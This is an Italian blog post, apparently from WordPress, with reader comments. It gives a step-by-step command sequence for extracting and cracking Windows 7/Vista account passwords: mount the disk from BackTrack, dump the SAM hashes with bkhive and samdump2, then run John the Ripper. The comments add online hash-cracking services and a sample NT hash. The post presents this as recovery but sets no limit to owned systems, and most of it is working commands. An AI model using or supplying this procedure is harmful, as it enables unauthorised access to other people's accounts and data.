Cracking Windows 7/Vista password


Ogni volta che ne ho bisogno mi dimentico la procedura e perdo sempre un sacco di tempo per raccogliere le idee, così mi sono trascritto i comandi e li condivido volentieri con voi.

Non fate i lamerozzi, se siete interessati (e dovreste esserlo) a cosa state davvero combinando, cercate altrove della documentazione approfondita.

Hypothesis: Backtrack4 e hard disk sul quale è/era installato Windows.

Thesis: recuperare le password degli utenti.

Una volta avviata Backtrack, montate la partizione dell’hard disk sulla quale è installato Windows (in questo tutorial ho usato /mnt e la mia partizione era sda4).

mount /dev/sda4 /mnt/

Spostatevi nella directory (a seconda di dove avete montato la partizione):

cd /mnt/Windows/System32/config

Date i comandi:

bkhive SYSTEM /root/system.txt
samdump2 SAM /root/system.txt > /root/pwd.txt

Se siete interessati a degli utenti in particolare aprite il file pwd.txt ed eliminate le righe degli utenti che non vi interessano.

Spostatevi nella directory:

cd /pentest/passwords/jtr/

Date il comando:

./john -f:NT /root/pwd.txt

E adesso L’attesa può durare diversi minuti (anche ore, giorni…), ma poi spunteranno alla vostra destra i nomi degli utenti e alla vostra sinistra le relative password!

Ah, se non le vedete scritte, vuol dire che sono vuote.

Potrebbe interessarvi anche questo articolo su come recuperare le password di Ubuntu.

7 thoughts on “Cracking Windows 7/Vista password

  1. “Due to abuse, the cracker has been closed to the public”
    Non riesco a utilizzare il sito che mi hai segnalato!

  2. Guarda, ora non ho partizioni windows sotto mano quindi nessun hash però basta che copi l’hash che estrai con samdum2 ad esempio:

    di:
    Administrator::2D5545077D7B7D2ACCF9155E3E7DB453::::.: ect

    Invii:
    2D5545077D7B7D2ACCF9155E3E7DB453

    e speri che le raimboy lo cracchino😉

  3. Scusa, ho letto solo ora😉

    Peccato…

    Comunque puoi usare questo:

    http://www.lmcrack.com/

    Mi ha craccato una password di 18 caratteri in meno di una settimana…
    Peccato che se gli mandi l’hash da craccare, sia a pagamenti ma comunque 4.89 $ non mi mandano in rosso😉

    Altrimenti spera che sia già stata craccata😀

  4. Devo dire che con il sistema che ho spiegato nell’articolo sono sempre riuscito ad ottenere risultati. E’ raro trovare qualche utente che abbia una password più lunga di 10 caratteri.
    Ciao!

  5. Pingback: Cracking Ubuntu password « six110@wordpress:~#

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s